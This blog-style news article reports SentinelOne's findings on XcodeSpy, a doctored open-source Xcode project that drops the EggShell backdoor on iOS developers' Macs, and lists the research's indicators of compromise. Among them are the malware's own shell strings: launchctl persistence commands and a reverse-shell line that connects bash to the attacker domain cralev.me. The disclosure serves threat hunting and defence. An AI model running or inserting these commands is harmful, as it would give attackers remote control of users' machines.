HEAD OF MARKETING COMMUNICATIONS & PR

According to research published by SentinelOne, hackers are now targeting iOS developers with an EggShell backdoor that has worked its way into a shared Xcode project.

The company was alerted by an anonymous researcher that a malicious code was corrupting a development project in Xcode, Apple’s integrated development environment (IDE) used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.

We recently became aware of a trojanized Xcode project in the wild targeting iOS developers thanks to a tip from an anonymous researcher. The malicious project is a doctored version of a legitimate, open-source project available on GitHub. The project offers iOS developers several advanced features for animating the iOS Tab Bar based on user interaction.

Source

The malicious Xcode project, dubbed XcodeSpy, installs an EggShell backdoor version on the developer’s macOS computer, which is able to record the victim’s microphone, camera, and keyboard movements, as well as uploading and downloading files.

As claimed by SentinelOne researchers, the fact that there is malicious code exploiting a shared Xcode project could raise questions about whether the hackers are targeting developers in order to carry on a supply chain attack.

Supply chain attacks concerned developers for a long time, especially in recent months when they have quickly progressed as the federal government and private sector work to respond to the SolarWinds incident, in which alleged Russian actors are suspected to have conducted a widespread espionage operation through a bad software update. This attack has shown that there is no institution too big to be breached and no organization is completely safe from ransomware.

Source

There are two known variants of EggShell:

#1. Custom backdoors which contain a number of encrypted C2 URLs

#2. Encrypted strings for various file paths

One encrypted string particularly is shared between the doctored Xcode project and the custom backdoors, connecting them as part of the same ‘XcodeSpy’ campaign, the researchers said.
Both samples were uploaded to the malware sharing repository VirusTotal in August and October 2020.

The later sample was also found in the wild in late 2020 on a victim’s Mac in the United States. For reasons of confidentiality, we are unable to provide further details about the ITW incident. However, the victim reported that they are repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities.

Source

As the true reason behind these attacks is not known yet, the way the hackers infiltrated the Eggshell backdoor into the Xcode project could apply in other cases as well.

To help threat hunters and developers sidestep such attacks, SentinelOne researchers provided a list of known indicators of compromise:

URLs & Resolving IPs

www[.]cralev.me/

hxxps://www[.]liveupdate.cc/preview/update.php

hxxps://www[.]appmarket.co/category/search.php

hxxps://www[.]recentnews.cc/latest/details.php

hxxps://www[.]truckrental.cc/order/search.php

hxxps://www[.]everestnote.com/sheet/list.php

hxxps://www[.]alinbox.co/product/product_detail.php

hxxps://www[.]suppro.co/category/search.php

 

193.34.167.111

193.34.167.205

 

EggShell bins: */.update

SHA 256: 6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b

SHA 1: 556a2174398890e3d628aec0163a42a7b7fb8ffd

SHA 256: cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134

SHA 1: 0ae9d61185f793c6d53e560e91265583675abeb6

 

Xcode proj: TabBarInteraction.zip

SHA 256: 1cfa154d0145c1fe059ffe61e7b295c16bbc0e0b0e707e7ad0b5f76c7d6b66d2

SHA 1: d65334d6c829955947f0ceb2258581c59cfd7dab

 

Encoded Filepaths

~/Library/Application Scripts/com.apple.TextEdit/.stors

~/Library/Application Scripts/com.apple.Preview/.stors

~/Library/Application Scripts/com.apple.usernoted/.wfy1607

~/Library/Application Scripts/com.apple.TextEdit/.scriptdb

~/Library/Application Support/com.apple.AppStore/.update

~/Library/Application Support/com.apple.usernoted/.wfy1607

~/Library/LaunchAgents/com.apple.usagestatistics.plist

~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist

/private/tmp/.osacache

/private/tmp/.osacache2

/private/tmp/.update

/tmp/.avatmp

/private/tmp/.wt0217.lck

/private/tmp/.tag

 

Behavioral Indicators

killall %@;sleep 3;cp “%@” “%@”;chmod +x “%@”;”%@” %@ 1>/dev/null 2>/dev/null

if (! pgrep -x %@ >/dev/null);then cp “%@” “%@”;chmod +x “%@”;”%@”;fi;

sleep 1;launchctl unload “%@” > /dev/null;launchctl load “%@” > /dev/null

launchctl unload “%@” 2>/dev/null; rm “%@”

echo mdbcmd > /private/tmp/.tag;bash&> /dev/tcp/www.cralev.me/443 0>&1 &

How to Spot and Prevent Apple ID Phishing Scams

Android Malware: Your Mobile Device Isn’t Safe from Hackers

Analysis: How Malware Creators Use Spam To Maximize Their Impact

Leave a Reply

Your email address will not be published. Required fields are marked *

GO TO TOP